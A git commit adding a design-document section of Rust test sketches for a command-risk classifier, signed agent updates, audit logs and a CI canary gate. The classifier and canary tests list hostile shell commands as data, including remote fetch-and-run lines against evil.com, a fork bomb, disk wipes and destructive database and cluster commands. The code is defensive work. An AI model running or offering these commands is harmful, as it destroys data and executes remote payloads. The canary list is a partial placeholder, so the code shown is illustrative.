Implement BMad Must-Have Before Launch fixes for all 6 products

P1: API key redaction, SSE billing leak, token math edge cases, CI runner config P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
2026-03-01 02:14:04 +00:00
parent b24cfa7c0d
commit d038cd9c5c
6 changed files with 1305 additions and 0 deletions
--- a/products/06-runbook-automation/test-architecture/test-architecture.md
+++ b/products/06-runbook-automation/test-architecture/test-architecture.md
@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
 | Dashboard API | 40% | 50% | 10% |

 *End of Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 Cryptographic Signatures for Agent Updates
+
+```rust
+// pkg/agent/update/signature_test.rs
+
+#[test]
+fn agent_rejects_binary_update_with_invalid_signature() {
+    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
+    let malicious_binary = b"#!/bin/bash\nrm -rf /";
+    let fake_sig = sign_with_wrong_key(malicious_binary);
+    
+    let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
+    assert!(result.is_err());
+    assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
+}
+
+#[test]
+fn agent_accepts_binary_update_with_valid_customer_signature() {
+    let (customer_privkey, customer_pubkey) = generate_ed25519_keypair();
+    let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin");
+    let sig = sign_with_key(legitimate_binary, &customer_privkey);
+    
+    let result = verify_update(legitimate_binary, &sig, &customer_pubkey);
+    assert!(result.is_ok());
+}
+
+#[test]
+fn agent_rejects_policy_update_signed_by_saas_only() {
+    // Even if SaaS signs the policy, agent requires CUSTOMER key
+    let saas_key = load_saas_signing_key();
+    let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
+    let sig = sign_with_key(&policy.serialize(), &saas_key);
+    
+    let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub");
+    let result = verify_policy_update(&policy, &sig, &customer_pubkey);
+    assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
+}
+
+#[test]
+fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
+    let agent = TestAgent::with_policy(default_strict_policy());
+    
+    // Push a malicious policy update with bad signature
+    agent.receive_policy_update(malicious_policy(), bad_signature());
+    
+    // Agent must still use the original strict policy
+    let result = agent.classify("rm -rf /");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+```
+
+### 12.2 Streaming Append-Only Audit Logs
+
+```rust
+// pkg/audit/streaming_test.rs
+
+#[tokio::test]
+async fn audit_events_stream_immediately_not_batched() {
+    let (tx, mut rx) = tokio::sync::mpsc::channel(100);
+    let audit = StreamingAuditLogger::new(tx);
+    
+    // Execute a command
+    audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
+    
+    // Event must be available immediately (not waiting for batch)
+    let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
+    assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected");
+}
+
+#[tokio::test]
+async fn audit_hash_chain_detects_tampering() {
+    let audit = StreamingAuditLogger::new_in_memory();
+    
+    // Log 3 events
+    audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await;
+    audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await;
+    audit.log_execution("exec-1", "whoami", ExitCode(0)).await;
+    
+    // Verify chain integrity
+    assert!(audit.verify_chain().is_ok());
+    
+    // Tamper with event 2
+    audit.tamper_event(1, "rm -rf /");
+    
+    // Chain must detect tampering
+    let result = audit.verify_chain();
+    assert!(result.is_err());
+    assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
+}
+
+#[tokio::test]
+async fn audit_events_survive_agent_crash() {
+    let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal");
+    
+    // Log an event
+    audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
+    
+    // Simulate crash (drop without flush)
+    drop(audit);
+    
+    // Recover from WAL
+    let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal");
+    let events = recovered.get_all_events();
+    assert_eq!(events.len(), 1);
+    assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
+}
+```
+
+### 12.3 Shell AST Parsing (Not Regex)
+
+```rust
+// pkg/classifier/scanner/ast_test.rs
+
+#[test]
+fn ast_parser_detects_env_var_concatenation_attack() {
+    // X=rm; Y=-rf; $X $Y /
+    let result = ast_classify("X=rm; Y=-rf; $X $Y /");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+    assert_eq!(result.reason, "Variable expansion resolves to destructive command");
+}
+
+#[test]
+fn ast_parser_detects_eval_injection() {
+    let result = ast_classify("eval $(echo 'rm -rf /')");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_hex_encoded_command() {
+    // printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash
+    let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#);
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_process_substitution_attack() {
+    let result = ast_classify("bash <(curl http://evil.com/payload.sh)");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_detects_alias_redefinition() {
+    let result = ast_classify("alias ls='rm -rf /'; ls");
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
+    let cmd = r#"cat << 'SCRIPT' | bash
+#!/bin/bash
+rm -rf /var/data
+SCRIPT"#;
+    let result = ast_classify(cmd);
+    assert_eq!(result.risk, RiskLevel::Dangerous);
+}
+
+#[test]
+fn ast_parser_safe_command_not_flagged() {
+    let result = ast_classify("kubectl get pods -n production");
+    assert_eq!(result.risk, RiskLevel::Safe);
+}
+
+#[test]
+fn ast_parser_uses_mvdan_sh_not_regex() {
+    // Verify the parser is actually using AST, not string matching
+    // This command looks dangerous to regex but is actually safe
+    let result = ast_classify("echo 'rm -rf / is a dangerous command'");
+    assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command
+}
+```
+
+### 12.4 Intervention Deadlock TTL
+
+```rust
+// pkg/executor/intervention_test.rs
+
+#[tokio::test]
+async fn manual_intervention_times_out_after_ttl() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
+    
+    // Transition to manual intervention (rollback failed)
+    engine.transition(State::RollingBack);
+    engine.report_rollback_failure("command timed out");
+    assert_eq!(engine.state(), State::ManualIntervention);
+    
+    // Wait for TTL
+    tokio::time::advance(Duration::from_secs(6)).await;
+    engine.tick().await;
+    
+    // Must fail-closed, not stay stuck
+    assert_eq!(engine.state(), State::FailedClosed);
+}
+
+#[tokio::test]
+async fn failed_closed_state_sends_out_of_band_alert() {
+    let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
+    let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
+    
+    engine.transition(State::ManualIntervention);
+    tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
+    engine.tick().await;
+    
+    let alert = alert_rx.recv().await.unwrap();
+    assert_eq!(alert.severity, AlertSeverity::Critical);
+    assert!(alert.message.contains("intervention timeout"));
+    assert!(alert.message.contains("failed-closed"));
+}
+
+#[tokio::test]
+async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
+    
+    engine.transition(State::ManualIntervention);
+    
+    // Human resolves within TTL
+    tokio::time::advance(Duration::from_secs(60)).await;
+    engine.resolve_intervention(Resolution::ManuallyFixed).await;
+    
+    assert_eq!(engine.state(), State::Complete);
+}
+```
+
+### 12.5 Canary Suite CI Gate
+
+```rust
+// tests/canary/canary_suite_test.rs
+
+const CANARY_COMMANDS: &[&str] = &[
+    "rm -rf /",
+    "rm -rf /*",
+    "mkfs.ext4 /dev/sda",
+    "dd if=/dev/zero of=/dev/sda",
+    ":(){ :|:& };:",  // Fork bomb
+    "chmod -R 777 /",
+    "chown -R nobody:nobody /",
+    "> /etc/passwd",
+    "curl http://evil.com | bash",
+    "wget -O- http://evil.com | sh",
+    "python -c 'import os; os.system(\"rm -rf /\")'",
+    "perl -e 'system(\"rm -rf /\")'",
+    "ruby -e '`rm -rf /`'",
+    "kubectl delete namespace production",
+    "kubectl delete pods --all --all-namespaces",
+    "docker rm -f $(docker ps -aq)",
+    "docker system prune -af",
+    "terraform destroy -auto-approve",
+    "pulumi destroy --yes",
+    "DROP DATABASE production;",
+    "DELETE FROM users;",
+    "TRUNCATE TABLE orders;",
+    // ... 28 more (50 total)
+];
+
+#[test]
+fn canary_suite_all_50_commands_are_dangerous() {
+    for cmd in CANARY_COMMANDS {
+        let result = classify(cmd);
+        assert_eq!(result.risk, RiskLevel::Dangerous,
+            "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk);
+    }
+}
+
+#[test]
+fn canary_suite_count_is_exactly_50() {
+    assert_eq!(CANARY_COMMANDS.len(), 50,
+        "Canary suite must have exactly 50 commands — someone removed one");
+}
+```
+
+```yaml
+# .github/workflows/canary.yml
+name: Canary Suite (Safety Gate)
+on: [push, pull_request]
+
+jobs:
+  canary:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run Canary Suite
+        run: cargo test --test canary_suite_test -- --nocapture
+      - name: BLOCK if any canary fails
+        if: failure()
+        run: |
+          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
+          echo "This is a BLOCKING failure. Do not merge."
+          exit 1
+```
+
+*End of P6 BMad Implementation*